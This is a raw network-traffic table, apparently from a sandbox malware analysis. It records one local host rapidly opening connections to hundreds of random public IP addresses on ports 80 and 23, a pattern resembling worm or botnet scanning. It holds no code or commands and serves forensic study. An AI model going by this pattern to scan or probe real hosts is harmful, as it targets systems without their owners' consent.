                                                          Dec 3, 2024 23:16:49.188944101 CET4059680192.168.2.23164.119.209.105
                                                          Dec 3, 2024 23:16:49.188951015 CET4059680192.168.2.23194.250.154.222
                                                          Dec 3, 2024 23:16:49.189047098 CET4659480192.168.2.23107.254.158.162
                                                          Dec 3, 2024 23:16:49.189047098 CET5752880192.168.2.23186.45.45.229
                                                          Dec 3, 2024 23:16:49.189053059 CET3652680192.168.2.2388.109.144.121
                                                          Dec 3, 2024 23:16:49.189070940 CET5830280192.168.2.23192.62.46.240
                                                          Dec 3, 2024 23:16:49.189074039 CET3519680192.168.2.23116.59.162.85
                                                          Dec 3, 2024 23:16:49.189078093 CET4281080192.168.2.23177.95.70.145
                                                          Dec 3, 2024 23:16:49.189078093 CET5908280192.168.2.23181.16.202.67
                                                          Dec 3, 2024 23:16:49.189100027 CET4690480192.168.2.23134.104.83.77
                                                          Dec 3, 2024 23:16:49.189100027 CET4690480192.168.2.23134.104.83.77
                                                          Dec 3, 2024 23:16:49.189519882 CET4695880192.168.2.23134.104.83.77
                                                          Dec 3, 2024 23:16:49.189881086 CET3754080192.168.2.2341.76.192.116
                                                          Dec 3, 2024 23:16:49.189881086 CET3754080192.168.2.2341.76.192.116
                                                          Dec 3, 2024 23:16:49.190154076 CET3759480192.168.2.2341.76.192.116
                                                          Dec 3, 2024 23:16:49.190496922 CET5007480192.168.2.23112.198.79.120
                                                          Dec 3, 2024 23:16:49.190496922 CET5007480192.168.2.23112.198.79.120
                                                          Dec 3, 2024 23:16:49.190769911 CET5012680192.168.2.23112.198.79.120
                                                          Dec 3, 2024 23:16:49.191178083 CET4415880192.168.2.23131.115.153.201
                                                          Dec 3, 2024 23:16:49.191178083 CET4415880192.168.2.23131.115.153.201
                                                          Dec 3, 2024 23:16:49.191437006 CET4422080192.168.2.23131.115.153.201
                                                          Dec 3, 2024 23:16:49.191777945 CET4411880192.168.2.23154.175.128.164
                                                          Dec 3, 2024 23:16:49.191777945 CET4411880192.168.2.23154.175.128.164
                                                          Dec 3, 2024 23:16:49.192053080 CET4417680192.168.2.23154.175.128.164
                                                          Dec 3, 2024 23:16:49.192404985 CET3317080192.168.2.2364.184.219.41
                                                          Dec 3, 2024 23:16:49.192404985 CET3317080192.168.2.2364.184.219.41
                                                          Dec 3, 2024 23:16:49.192671061 CET3322480192.168.2.2364.184.219.41
                                                          Dec 3, 2024 23:16:49.312084913 CET8040596176.69.242.94192.168.2.23
                                                          Dec 3, 2024 23:16:49.312119961 CET804059695.58.153.193192.168.2.23
                                                          Dec 3, 2024 23:16:49.312129974 CET804059690.249.44.175192.168.2.23
                                                          Dec 3, 2024 23:16:49.312138081 CET8040596138.192.209.119192.168.2.23
                                                          Dec 3, 2024 23:16:49.312156916 CET8040596117.110.109.99192.168.2.23
                                                          Dec 3, 2024 23:16:49.312172890 CET804059649.209.5.244192.168.2.23
                                                          Dec 3, 2024 23:16:49.312194109 CET804059674.123.234.35192.168.2.23
                                                          Dec 3, 2024 23:16:49.312203884 CET8040596145.33.190.157192.168.2.23
                                                          Dec 3, 2024 23:16:49.312212944 CET804059632.125.248.35192.168.2.23
                                                          Dec 3, 2024 23:16:49.312241077 CET8040596217.189.104.34192.168.2.23
                                                          Dec 3, 2024 23:16:49.312252998 CET4059680192.168.2.2374.123.234.35
                                                          Dec 3, 2024 23:16:49.312253952 CET4059680192.168.2.23117.110.109.99
                                                          Dec 3, 2024 23:16:49.312257051 CET8040596217.19.114.229192.168.2.23
                                                          Dec 3, 2024 23:16:49.312257051 CET4059680192.168.2.23138.192.209.119
                                                          Dec 3, 2024 23:16:49.312257051 CET4059680192.168.2.23176.69.242.94
                                                          Dec 3, 2024 23:16:49.312263966 CET4059680192.168.2.23145.33.190.157
                                                          Dec 3, 2024 23:16:49.312263966 CET4059680192.168.2.2332.125.248.35
                                                          Dec 3, 2024 23:16:49.312267065 CET804829675.96.152.124192.168.2.23
                                                          Dec 3, 2024 23:16:49.312272072 CET4059680192.168.2.2395.58.153.193
                                                          Dec 3, 2024 23:16:49.312275887 CET804829675.96.152.124192.168.2.23
                                                          Dec 3, 2024 23:16:49.312278032 CET4059680192.168.2.2390.249.44.175
                                                          Dec 3, 2024 23:16:49.312280893 CET4059680192.168.2.2349.209.5.244
                                                          Dec 3, 2024 23:16:49.312285900 CET4059680192.168.2.23217.189.104.34
                                                          Dec 3, 2024 23:16:49.312285900 CET8040596193.206.198.78192.168.2.23
                                                          Dec 3, 2024 23:16:49.312288046 CET4059680192.168.2.23217.19.114.229
                                                          Dec 3, 2024 23:16:49.312297106 CET804059669.10.3.184192.168.2.23
                                                          Dec 3, 2024 23:16:49.312302113 CET8040596135.89.3.44192.168.2.23
                                                          Dec 3, 2024 23:16:49.312316895 CET4829680192.168.2.2375.96.152.124
                                                          Dec 3, 2024 23:16:49.312341928 CET4059680192.168.2.23193.206.198.78
                                                          Dec 3, 2024 23:16:49.312344074 CET4059680192.168.2.2369.10.3.184
                                                          Dec 3, 2024 23:16:49.312344074 CET4059680192.168.2.23135.89.3.44
                                                          Dec 3, 2024 23:16:49.312362909 CET804059641.75.167.181192.168.2.23
                                                          Dec 3, 2024 23:16:49.312372923 CET8040596175.204.245.90192.168.2.23
                                                          Dec 3, 2024 23:16:49.312381029 CET8040596181.49.1.9192.168.2.23
                                                          Dec 3, 2024 23:16:49.312391043 CET8040596110.74.199.97192.168.2.23
                                                          Dec 3, 2024 23:16:49.312398911 CET804059636.177.131.90192.168.2.23
                                                          Dec 3, 2024 23:16:49.312402964 CET4059680192.168.2.2341.75.167.181
                                                          Dec 3, 2024 23:16:49.312403917 CET4059680192.168.2.23175.204.245.90
                                                          Dec 3, 2024 23:16:49.312410116 CET8040596206.218.156.58192.168.2.23
                                                          Dec 3, 2024 23:16:49.312411070 CET4059680192.168.2.23181.49.1.9
                                                          Dec 3, 2024 23:16:49.312418938 CET4059680192.168.2.23110.74.199.97
                                                          Dec 3, 2024 23:16:49.312418938 CET8040596207.44.6.28192.168.2.23
                                                          Dec 3, 2024 23:16:49.312437057 CET4059680192.168.2.2336.177.131.90
                                                          Dec 3, 2024 23:16:49.312443972 CET4059680192.168.2.23206.218.156.58
                                                          Dec 3, 2024 23:16:49.312449932 CET4059680192.168.2.23207.44.6.28
                                                          Dec 3, 2024 23:16:49.312851906 CET8046904134.104.83.77192.168.2.23
                                                          Dec 3, 2024 23:16:49.313114882 CET8057528186.45.45.229192.168.2.23
                                                          Dec 3, 2024 23:16:49.313154936 CET5752880192.168.2.23186.45.45.229
                                                          Dec 3, 2024 23:16:49.313219070 CET8059082181.16.202.67192.168.2.23
                                                          Dec 3, 2024 23:16:49.313261032 CET5908280192.168.2.23181.16.202.67
                                                          Dec 3, 2024 23:16:49.313677073 CET803754041.76.192.116192.168.2.23
                                                          Dec 3, 2024 23:16:49.313777924 CET803652688.109.144.121192.168.2.23
                                                          Dec 3, 2024 23:16:49.313817978 CET3652680192.168.2.2388.109.144.121
                                                          Dec 3, 2024 23:16:49.314089060 CET8058302192.62.46.240192.168.2.23
                                                          Dec 3, 2024 23:16:49.314132929 CET5830280192.168.2.23192.62.46.240
                                                          Dec 3, 2024 23:16:49.314171076 CET8050074112.198.79.120192.168.2.23
                                                          Dec 3, 2024 23:16:49.314421892 CET8042810177.95.70.145192.168.2.23
                                                          Dec 3, 2024 23:16:49.314464092 CET4281080192.168.2.23177.95.70.145
                                                          Dec 3, 2024 23:16:49.314728975 CET8035196116.59.162.85192.168.2.23
                                                          Dec 3, 2024 23:16:49.314770937 CET3519680192.168.2.23116.59.162.85
                                                          Dec 3, 2024 23:16:49.314975023 CET8044158131.115.153.201192.168.2.23
                                                          Dec 3, 2024 23:16:49.315030098 CET8046594107.254.158.162192.168.2.23
                                                          Dec 3, 2024 23:16:49.315066099 CET4659480192.168.2.23107.254.158.162
                                                          Dec 3, 2024 23:16:49.315493107 CET8044220131.115.153.201192.168.2.23
                                                          Dec 3, 2024 23:16:49.315501928 CET8044118154.175.128.164192.168.2.23
                                                          Dec 3, 2024 23:16:49.315535069 CET4422080192.168.2.23131.115.153.201
                                                          Dec 3, 2024 23:16:49.315567970 CET4422080192.168.2.23131.115.153.201
                                                          Dec 3, 2024 23:16:49.315902948 CET3599280192.168.2.23176.69.242.94
                                                          Dec 3, 2024 23:16:49.316046953 CET803317064.184.219.41192.168.2.23
                                                          Dec 3, 2024 23:16:49.316514969 CET4214680192.168.2.23138.192.209.119
                                                          Dec 3, 2024 23:16:49.317115068 CET4870880192.168.2.23117.110.109.99
                                                          Dec 3, 2024 23:16:49.317714930 CET3298280192.168.2.2374.123.234.35
                                                          Dec 3, 2024 23:16:49.318315983 CET3506680192.168.2.23145.33.190.157
                                                          Dec 3, 2024 23:16:49.318921089 CET5646680192.168.2.2332.125.248.35
                                                          Dec 3, 2024 23:16:49.319523096 CET5311880192.168.2.2395.58.153.193
                                                          Dec 3, 2024 23:16:49.320137978 CET5060080192.168.2.2390.249.44.175
                                                          Dec 3, 2024 23:16:49.320723057 CET4830080192.168.2.2349.209.5.244
                                                          Dec 3, 2024 23:16:49.321315050 CET5261280192.168.2.23217.189.104.34
                                                          Dec 3, 2024 23:16:49.321914911 CET4507480192.168.2.23217.19.114.229
                                                          Dec 3, 2024 23:16:49.322537899 CET6017680192.168.2.23193.206.198.78
                                                          Dec 3, 2024 23:16:49.323149920 CET5642880192.168.2.2369.10.3.184
                                                          Dec 3, 2024 23:16:49.323743105 CET4438280192.168.2.23135.89.3.44
                                                          Dec 3, 2024 23:16:49.324332952 CET3802280192.168.2.2341.75.167.181
                                                          Dec 3, 2024 23:16:49.324906111 CET3321480192.168.2.23175.204.245.90
                                                          Dec 3, 2024 23:16:49.325485945 CET5229880192.168.2.23181.49.1.9
                                                          Dec 3, 2024 23:16:49.326047897 CET4673880192.168.2.23110.74.199.97
                                                          Dec 3, 2024 23:16:49.326641083 CET5983280192.168.2.2336.177.131.90
                                                          Dec 3, 2024 23:16:49.327217102 CET3652080192.168.2.23206.218.156.58
                                                          Dec 3, 2024 23:16:49.327806950 CET6098480192.168.2.23207.44.6.28
                                                          Dec 3, 2024 23:16:49.355925083 CET8044118154.175.128.164192.168.2.23
                                                          Dec 3, 2024 23:16:49.355937004 CET8046904134.104.83.77192.168.2.23
                                                          Dec 3, 2024 23:16:49.355978012 CET8044158131.115.153.201192.168.2.23
                                                          Dec 3, 2024 23:16:49.355987072 CET8050074112.198.79.120192.168.2.23
                                                          Dec 3, 2024 23:16:49.359844923 CET803754041.76.192.116192.168.2.23
                                                          Dec 3, 2024 23:16:49.363878012 CET803317064.184.219.41192.168.2.23
                                                          Dec 3, 2024 23:16:49.439552069 CET8035992176.69.242.94192.168.2.23
                                                          Dec 3, 2024 23:16:49.439574003 CET8044220131.115.153.201192.168.2.23
                                                          Dec 3, 2024 23:16:49.439716101 CET3599280192.168.2.23176.69.242.94
                                                          Dec 3, 2024 23:16:49.439723015 CET4422080192.168.2.23131.115.153.201
                                                          Dec 3, 2024 23:16:49.439774036 CET3599280192.168.2.23176.69.242.94
                                                          Dec 3, 2024 23:16:49.439774036 CET3599280192.168.2.23176.69.242.94
                                                          Dec 3, 2024 23:16:49.440148115 CET3603480192.168.2.23176.69.242.94
                                                          Dec 3, 2024 23:16:49.440695047 CET8042146138.192.209.119192.168.2.23
                                                          Dec 3, 2024 23:16:49.440741062 CET4214680192.168.2.23138.192.209.119
                                                          Dec 3, 2024 23:16:49.440790892 CET4214680192.168.2.23138.192.209.119
                                                          Dec 3, 2024 23:16:49.440790892 CET4214680192.168.2.23138.192.209.119
                                                          Dec 3, 2024 23:16:49.441062927 CET4218880192.168.2.23138.192.209.119
                                                          Dec 3, 2024 23:16:49.441287994 CET8048708117.110.109.99192.168.2.23
                                                          Dec 3, 2024 23:16:49.441328049 CET4870880192.168.2.23117.110.109.99
                                                          Dec 3, 2024 23:16:49.441481113 CET4870880192.168.2.23117.110.109.99
                                                          Dec 3, 2024 23:16:49.441481113 CET4870880192.168.2.23117.110.109.99
                                                          Dec 3, 2024 23:16:49.441754103 CET4875080192.168.2.23117.110.109.99
                                                          Dec 3, 2024 23:16:49.441979885 CET803298274.123.234.35192.168.2.23
                                                          Dec 3, 2024 23:16:49.441989899 CET8035066145.33.190.157192.168.2.23
                                                          Dec 3, 2024 23:16:49.442019939 CET3506680192.168.2.23145.33.190.157
                                                          Dec 3, 2024 23:16:49.442022085 CET3298280192.168.2.2374.123.234.35
                                                          Dec 3, 2024 23:16:49.442172050 CET3298280192.168.2.2374.123.234.35
                                                          Dec 3, 2024 23:16:49.442172050 CET3298280192.168.2.2374.123.234.35
                                                          Dec 3, 2024 23:16:49.442444086 CET3302480192.168.2.2374.123.234.35
                                                          Dec 3, 2024 23:16:49.442787886 CET3506680192.168.2.23145.33.190.157
                                                          Dec 3, 2024 23:16:49.442787886 CET3506680192.168.2.23145.33.190.157
                                                          Dec 3, 2024 23:16:49.443059921 CET3510880192.168.2.23145.33.190.157
                                                          Dec 3, 2024 23:16:49.443264961 CET805646632.125.248.35192.168.2.23
                                                          Dec 3, 2024 23:16:49.443274021 CET805311895.58.153.193192.168.2.23
                                                          Dec 3, 2024 23:16:49.443303108 CET5646680192.168.2.2332.125.248.35
                                                          Dec 3, 2024 23:16:49.443305016 CET5311880192.168.2.2395.58.153.193
                                                          Dec 3, 2024 23:16:49.443476915 CET5646680192.168.2.2332.125.248.35
                                                          Dec 3, 2024 23:16:49.443476915 CET5646680192.168.2.2332.125.248.35
                                                          Dec 3, 2024 23:16:49.443751097 CET5650880192.168.2.2332.125.248.35
                                                          Dec 3, 2024 23:16:49.443754911 CET805060090.249.44.175192.168.2.23
                                                          Dec 3, 2024 23:16:49.443794012 CET5060080192.168.2.2390.249.44.175
                                                          Dec 3, 2024 23:16:49.444086075 CET5311880192.168.2.2395.58.153.193
                                                          Dec 3, 2024 23:16:49.444093943 CET5311880192.168.2.2395.58.153.193
                                                          Dec 3, 2024 23:16:49.444372892 CET5316080192.168.2.2395.58.153.193
                                                          Dec 3, 2024 23:16:49.444771051 CET5060080192.168.2.2390.249.44.175
                                                          Dec 3, 2024 23:16:49.444771051 CET5060080192.168.2.2390.249.44.175
                                                          Dec 3, 2024 23:16:49.444973946 CET804830049.209.5.244192.168.2.23
                                                          Dec 3, 2024 23:16:49.444983006 CET8052612217.189.104.34192.168.2.23
                                                          Dec 3, 2024 23:16:49.445009947 CET4830080192.168.2.2349.209.5.244
                                                          Dec 3, 2024 23:16:49.445017099 CET5261280192.168.2.23217.189.104.34
                                                          Dec 3, 2024 23:16:49.445048094 CET5064280192.168.2.2390.249.44.175
                                                          Dec 3, 2024 23:16:49.445453882 CET4830080192.168.2.2349.209.5.244
                                                          Dec 3, 2024 23:16:49.445453882 CET4830080192.168.2.2349.209.5.244
                                                          Dec 3, 2024 23:16:49.445621014 CET8045074217.19.114.229192.168.2.23
                                                          Dec 3, 2024 23:16:49.445657969 CET4507480192.168.2.23217.19.114.229
                                                          Dec 3, 2024 23:16:49.445728064 CET4834280192.168.2.2349.209.5.244
                                                          Dec 3, 2024 23:16:49.446053982 CET5261280192.168.2.23217.189.104.34
                                                          Dec 3, 2024 23:16:49.446053982 CET5261280192.168.2.23217.189.104.34
                                                          Dec 3, 2024 23:16:49.446202993 CET8060176193.206.198.78192.168.2.23
                                                          Dec 3, 2024 23:16:49.446237087 CET6017680192.168.2.23193.206.198.78
                                                          Dec 3, 2024 23:16:49.446326017 CET5265480192.168.2.23217.189.104.34
                                                          Dec 3, 2024 23:16:49.446717024 CET4507480192.168.2.23217.19.114.229
                                                          Dec 3, 2024 23:16:49.446717024 CET4507480192.168.2.23217.19.114.229
                                                          Dec 3, 2024 23:16:49.446974993 CET4511680192.168.2.23217.19.114.229
                                                          Dec 3, 2024 23:16:49.447221994 CET5255223192.168.2.23130.155.72.191
                                                          Dec 3, 2024 23:16:49.447221994 CET4760223192.168.2.2337.234.78.188
                                                          Dec 3, 2024 23:16:49.447221994 CET5772823192.168.2.23184.224.131.118
                                                          Dec 3, 2024 23:16:49.447226048 CET5583423192.168.2.23101.213.242.48
                                                          Dec 3, 2024 23:16:49.447231054 CET4513423192.168.2.23218.100.158.146
                                                          Dec 3, 2024 23:16:49.447233915 CET3918623192.168.2.23222.64.76.248
                                                          Dec 3, 2024 23:16:49.447233915 CET3491423192.168.2.2365.30.3.19
                                                          Dec 3, 2024 23:16:49.447242022 CET5271223192.168.2.23147.189.3.230
                                                          Dec 3, 2024 23:16:49.447248936 CET5929823192.168.2.23112.229.253.40
                                                          Dec 3, 2024 23:16:49.447251081 CET3710623192.168.2.2327.234.229.218
                                                          Dec 3, 2024 23:16:49.447252035 CET3573623192.168.2.23206.68.214.163
                                                          Dec 3, 2024 23:16:49.447258949 CET4121423192.168.2.23121.30.192.117
                                                          Dec 3, 2024 23:16:49.447261095 CET4100823192.168.2.2347.7.97.197
                                                          Dec 3, 2024 23:16:49.447262049 CET4108423192.168.2.23218.67.132.144
                                                          Dec 3, 2024 23:16:49.447263002 CET5145623192.168.2.23119.96.49.132
                                                          Dec 3, 2024 23:16:49.447263002 CET3844823192.168.2.2374.223.132.58
                                                          Dec 3, 2024 23:16:49.447267056 CET5765823192.168.2.23185.71.85.214
                                                          Dec 3, 2024 23:16:49.447273016 CET3803423192.168.2.2331.46.27.143
                                                          Dec 3, 2024 23:16:49.447273970 CET4866023192.168.2.2396.243.144.211
                                                          Dec 3, 2024 23:16:49.447276115 CET5642623192.168.2.2350.131.41.104
                                                          Dec 3, 2024 23:16:49.447278976 CET4923823192.168.2.2332.14.25.100
                                                          Dec 3, 2024 23:16:49.447295904 CET4962623192.168.2.2323.144.252.12
                                                          Dec 3, 2024 23:16:49.447295904 CET4595023192.168.2.23140.78.178.135
                                                          Dec 3, 2024 23:16:49.447297096 CET3794623192.168.2.23135.43.117.122
                                                          Dec 3, 2024 23:16:49.447299957 CET4369223192.168.2.23221.198.169.88
                                                          Dec 3, 2024 23:16:49.447299957 CET4255223192.168.2.239.231.222.167
                                                          Dec 3, 2024 23:16:49.447305918 CET5002823192.168.2.23115.214.33.197
                                                          Dec 3, 2024 23:16:49.447304964 CET3757023192.168.2.23140.76.10.211
                                                          Dec 3, 2024 23:16:49.447304964 CET3963223192.168.2.231.139.194.233
                                                          Dec 3, 2024 23:16:49.447308064 CET3714223192.168.2.23139.153.60.41
                                                          Dec 3, 2024 23:16:49.447308064 CET3313023192.168.2.23105.187.135.120
                                                          Dec 3, 2024 23:16:49.447308064 CET5474223192.168.2.2342.51.5.44
                                                          Dec 3, 2024 23:16:49.447320938 CET5109823192.168.2.23185.231.81.163
                                                          Dec 3, 2024 23:16:49.447331905 CET5240823192.168.2.23196.250.179.4
                                                          Dec 3, 2024 23:16:49.447331905 CET4012023192.168.2.2327.84.10.92
                                                          Dec 3, 2024 23:16:49.447331905 CET3582423192.168.2.2354.163.87.119
                                                          Dec 3, 2024 23:16:49.447333097 CET6017680192.168.2.23193.206.198.78
                                                          Dec 3, 2024 23:16:49.447331905 CET5046023192.168.2.23217.31.44.89
                                                          Dec 3, 2024 23:16:49.447333097 CET6017680192.168.2.23193.206.198.78
                                                          Dec 3, 2024 23:16:49.447385073 CET8044382135.89.3.44192.168.2.23
                                                          Dec 3, 2024 23:16:49.447419882 CET4438280192.168.2.23135.89.3.44
                                                          Dec 3, 2024 23:16:49.447609901 CET6021880192.168.2.23193.206.198.78
                                                          Dec 3, 2024 23:16:49.448024035 CET4438280192.168.2.23135.89.3.44
                                                          Dec 3, 2024 23:16:49.448024035 CET4438280192.168.2.23135.89.3.44
                                                          Dec 3, 2024 23:16:49.448296070 CET4442280192.168.2.23135.89.3.44
                                                          Dec 3, 2024 23:16:49.479243994 CET4392823192.168.2.23166.127.178.91
                                                          Dec 3, 2024 23:16:49.479244947 CET5537423192.168.2.2331.226.180.43
                                                          Dec 3, 2024 23:16:49.479248047 CET4552423192.168.2.23104.133.85.82
                                                          Dec 3, 2024 23:16:49.511329889 CET42836443192.168.2.2391.189.91.43
                                                          Dec 3, 2024 23:16:49.543235064 CET5331623192.168.2.23198.189.113.143
                                                          Dec 3, 2024 23:16:49.543236017 CET4760823192.168.2.23161.152.46.196
                                                          Dec 3, 2024 23:16:49.543236017 CET5832223192.168.2.23158.85.95.150
                                                          Dec 3, 2024 23:16:49.543246031 CET5763423192.168.2.2340.109.90.228
                                                          Dec 3, 2024 23:16:49.543246031 CET5438823192.168.2.2382.205.195.109
                                                          Dec 3, 2024 23:16:49.543246031 CET5950623192.168.2.2351.132.249.56
                                                          Dec 3, 2024 23:16:49.543247938 CET4876023192.168.2.23150.173.229.11
                                                          Dec 3, 2024 23:16:49.543250084 CET5528623192.168.2.23151.240.39.152
                                                          Dec 3, 2024 23:16:49.543250084 CET3513023192.168.2.2382.88.141.198
                                                          Dec 3, 2024 23:16:49.543260098 CET5031223192.168.2.2340.155.36.84
                                                          Dec 3, 2024 23:16:49.543260098 CET4772423192.168.2.2357.17.77.51
                                                          Dec 3, 2024 23:16:49.543261051 CET4087023192.168.2.23208.194.164.70
                                                          Dec 3, 2024 23:16:49.543261051 CET3287423192.168.2.23220.222.86.116
                                                          Dec 3, 2024 23:16:49.543265104 CET4114823192.168.2.2348.92.44.82
                                                          Dec 3, 2024 23:16:49.543275118 CET3606423192.168.2.2399.183.248.196
                                                          Dec 3, 2024 23:16:49.563520908 CET8035992176.69.242.94192.168.2.23
                                                          Dec 3, 2024 23:16:49.563879013 CET8036034176.69.242.94192.168.2.23
                                                          Dec 3, 2024 23:16:49.564012051 CET3603480192.168.2.23176.69.242.94
                                                          Dec 3, 2024 23:16:49.564012051 CET3603480192.168.2.23176.69.242.94
                                                          Dec 3, 2024 23:16:49.564564943 CET8042146138.192.209.119192.168.2.23
                                                          Dec 3, 2024 23:16:49.564692974 CET8042188138.192.209.119192.168.2.23
                                                          Dec 3, 2024 23:16:49.564743042 CET4218880192.168.2.23138.192.209.119
                                                          Dec 3, 2024 23:16:49.564764023 CET4218880192.168.2.23138.192.209.119
                                                          Dec 3, 2024 23:16:49.565083981 CET8048708117.110.109.99192.168.2.23
                                                          Dec 3, 2024 23:16:49.565398932 CET8048750117.110.109.99192.168.2.23
                                                          Dec 3, 2024 23:16:49.565438032 CET4875080192.168.2.23117.110.109.99
                                                          Dec 3, 2024 23:16:49.565455914 CET4875080192.168.2.23117.110.109.99
                                                          Dec 3, 2024 23:16:49.565931082 CET803298274.123.234.35192.168.2.23
                                                          Dec 3, 2024 23:16:49.566179037 CET803302474.123.234.35192.168.2.23
                                                          Dec 3, 2024 23:16:49.566224098 CET3302480192.168.2.2374.123.234.35
                                                          Dec 3, 2024 23:16:49.566253901 CET3302480192.168.2.2374.123.234.35
                                                          Dec 3, 2024 23:16:49.566401005 CET8035066145.33.190.157192.168.2.23
                                                          Dec 3, 2024 23:16:49.566735983 CET8035108145.33.190.157192.168.2.23
                                                          Dec 3, 2024 23:16:49.566776037 CET3510880192.168.2.23145.33.190.157
                                                          Dec 3, 2024 23:16:49.566798925 CET3510880192.168.2.23145.33.190.157
                                                          Dec 3, 2024 23:16:49.567123890 CET805646632.125.248.35192.168.2.23
                                                          Dec 3, 2024 23:16:49.567517996 CET805650832.125.248.35192.168.2.23
                                                          Dec 3, 2024 23:16:49.567553043 CET5650880192.168.2.2332.125.248.35
                                                          Dec 3, 2024 23:16:49.567572117 CET5650880192.168.2.2332.125.248.35
                                                          Dec 3, 2024 23:16:49.567879915 CET805311895.58.153.193192.168.2.23
                                                          Dec 3, 2024 23:16:49.568036079 CET805316095.58.153.193192.168.2.23
                                                          Dec 3, 2024 23:16:49.568073034 CET5316080192.168.2.2395.58.153.193
                                                          Dec 3, 2024 23:16:49.568097115 CET5316080192.168.2.2395.58.153.193
                                                          Dec 3, 2024 23:16:49.568522930 CET805060090.249.44.175192.168.2.23
                                                          Dec 3, 2024 23:16:49.569084883 CET805064290.249.44.175192.168.2.23
                                                          Dec 3, 2024 23:16:49.569137096 CET5064280192.168.2.2390.249.44.175
                                                          Dec 3, 2024 23:16:49.569163084 CET5064280192.168.2.2390.249.44.175
                                                          Dec 3, 2024 23:16:49.569215059 CET804830049.209.5.244192.168.2.23
                                                          Dec 3, 2024 23:16:49.569386005 CET804834249.209.5.244192.168.2.23
                                                          Dec 3, 2024 23:16:49.569423914 CET4834280192.168.2.2349.209.5.244
                                                          Dec 3, 2024 23:16:49.569436073 CET4834280192.168.2.2349.209.5.244
                                                          Dec 3, 2024 23:16:49.569742918 CET8052612217.189.104.34192.168.2.23
                                                          Dec 3, 2024 23:16:49.569916964 CET8052654217.189.104.34192.168.2.23
                                                          Dec 3, 2024 23:16:49.570000887 CET5265480192.168.2.23217.189.104.34
                                                          Dec 3, 2024 23:16:49.570012093 CET5265480192.168.2.23217.189.104.34
                                                          Dec 3, 2024 23:16:49.570297003 CET8045074217.19.114.229192.168.2.23
                                                          Dec 3, 2024 23:16:49.570681095 CET8045116217.19.114.229192.168.2.23
                                                          Dec 3, 2024 23:16:49.570719957 CET4511680192.168.2.23217.19.114.229
                                                          Dec 3, 2024 23:16:49.570739031 CET4511680192.168.2.23217.19.114.229
                                                          Dec 3, 2024 23:16:49.570811033 CET2352552130.155.72.191192.168.2.23
                                                          Dec 3, 2024 23:16:49.570857048 CET5255223192.168.2.23130.155.72.191
                                                          Dec 3, 2024 23:16:49.570949078 CET8060176193.206.198.78192.168.2.23
                                                          Dec 3, 2024 23:16:49.571228027 CET5407223192.168.2.2368.165.229.172
                                                          Dec 3, 2024 23:16:49.571635008 CET8044382135.89.3.44192.168.2.23
                                                          Dec 3, 2024 23:16:49.571765900 CET3658623192.168.2.2346.118.209.58
                                                          Dec 3, 2024 23:16:49.572280884 CET4457423192.168.2.23218.106.164.220
                                                          Dec 3, 2024 23:16:49.572784901 CET5645823192.168.2.2353.214.98.76
                                                          Dec 3, 2024 23:16:49.573359966 CET3280023192.168.2.239.114.8.209
                                                          Dec 3, 2024 23:16:49.575212955 CET5546023192.168.2.2323.191.150.65
                                                          Dec 3, 2024 23:16:49.575215101 CET3759023192.168.2.23205.114.36.151
                                                          Dec 3, 2024 23:16:49.575215101 CET5961623192.168.2.23189.231.50.87
                                                          Dec 3, 2024 23:16:49.575215101 CET3505823192.168.2.2364.16.22.181
                                                          Dec 3, 2024 23:16:49.575223923 CET5262423192.168.2.234.181.235.234
                                                          Dec 3, 2024 23:16:49.575223923 CET5501623192.168.2.23206.181.41.37
                                                          Dec 3, 2024 23:16:49.575232983 CET5124423192.168.2.2377.112.247.243
                                                          Dec 3, 2024 23:16:49.575233936 CET5735823192.168.2.2365.86.58.226
                                                          Dec 3, 2024 23:16:49.575234890 CET3556223192.168.2.23113.40.76.240
                                                          Dec 3, 2024 23:16:49.575234890 CET5716223192.168.2.23131.79.78.52
                                                          Dec 3, 2024 23:16:49.575242043 CET3711223192.168.2.2314.3.188.11
                                                          Dec 3, 2024 23:16:49.575243950 CET5958823192.168.2.2320.206.54.166
                                                          Dec 3, 2024 23:16:49.575243950 CET5268623192.168.2.23212.140.111.119
                                                          Dec 3, 2024 23:16:49.575243950 CET4931623192.168.2.2353.69.255.214
                                                          Dec 3, 2024 23:16:49.575243950 CET4637023192.168.2.23178.31.253.80
                                                          Dec 3, 2024 23:16:49.575249910 CET4546823192.168.2.23183.133.122.5
                                                          Dec 3, 2024 23:16:49.575249910 CET5348423192.168.2.23199.216.131.248
                                                          Dec 3, 2024 23:16:49.575251102 CET5915823192.168.2.23129.96.32.114
                                                          Dec 3, 2024 23:16:49.575253010 CET5966423192.168.2.23163.81.23.79
                                                          Dec 3, 2024 23:16:49.575261116 CET5620423192.168.2.234.185.189.239
                                                          Dec 3, 2024 23:16:49.575261116 CET5441023192.168.2.23193.234.170.22
                                                          Dec 3, 2024 23:16:49.575261116 CET4289823192.168.2.2393.130.183.12
                                                          Dec 3, 2024 23:16:49.575268030 CET3650823192.168.2.2325.98.126.63
                                                          Dec 3, 2024 23:16:49.575273991 CET5253223192.168.2.23191.103.34.9
                                                          Dec 3, 2024 23:16:49.587670088 CET4636823192.168.2.23151.7.132.213
                                                          Dec 3, 2024 23:16:49.588346004 CET5342423192.168.2.23118.159.70.78
                                                          Dec 3, 2024 23:16:49.603132963 CET2343928166.127.178.91192.168.2.23
                                                          Dec 3, 2024 23:16:49.603142023 CET235537431.226.180.43192.168.2.23
                                                          Dec 3, 2024 23:16:49.603173018 CET2345524104.133.85.82192.168.2.23
                                                          Dec 3, 2024 23:16:49.603188038 CET4392823192.168.2.23166.127.178.91
                                                          Dec 3, 2024 23:16:49.603189945 CET5537423192.168.2.2331.226.180.43
                                                          Dec 3, 2024 23:16:49.603214979 CET4552423192.168.2.23104.133.85.82
                                                          Dec 3, 2024 23:16:49.603857994 CET8035992176.69.242.94192.168.2.23
                                                          Dec 3, 2024 23:16:49.607919931 CET805646632.125.248.35192.168.2.23
                                                          Dec 3, 2024 23:16:49.607928991 CET8042146138.192.209.119192.168.2.23
                                                          Dec 3, 2024 23:16:49.607949018 CET8035066145.33.190.157192.168.2.23
                                                          Dec 3, 2024 23:16:49.607956886 CET803298274.123.234.35192.168.2.23
                                                          Dec 3, 2024 23:16:49.608016968 CET8048708117.110.109.99192.168.2.23
                                                          Dec 3, 2024 23:16:49.611880064 CET805311895.58.153.193192.168.2.23
                                                          Dec 3, 2024 23:16:49.611897945 CET804830049.209.5.244192.168.2.23
                                                          Dec 3, 2024 23:16:49.611912966 CET805060090.249.44.175192.168.2.23
                                                          Dec 3, 2024 23:16:49.611983061 CET8044382135.89.3.44192.168.2.23
                                                          Dec 3, 2024 23:16:49.611993074 CET8060176193.206.198.78192.168.2.23
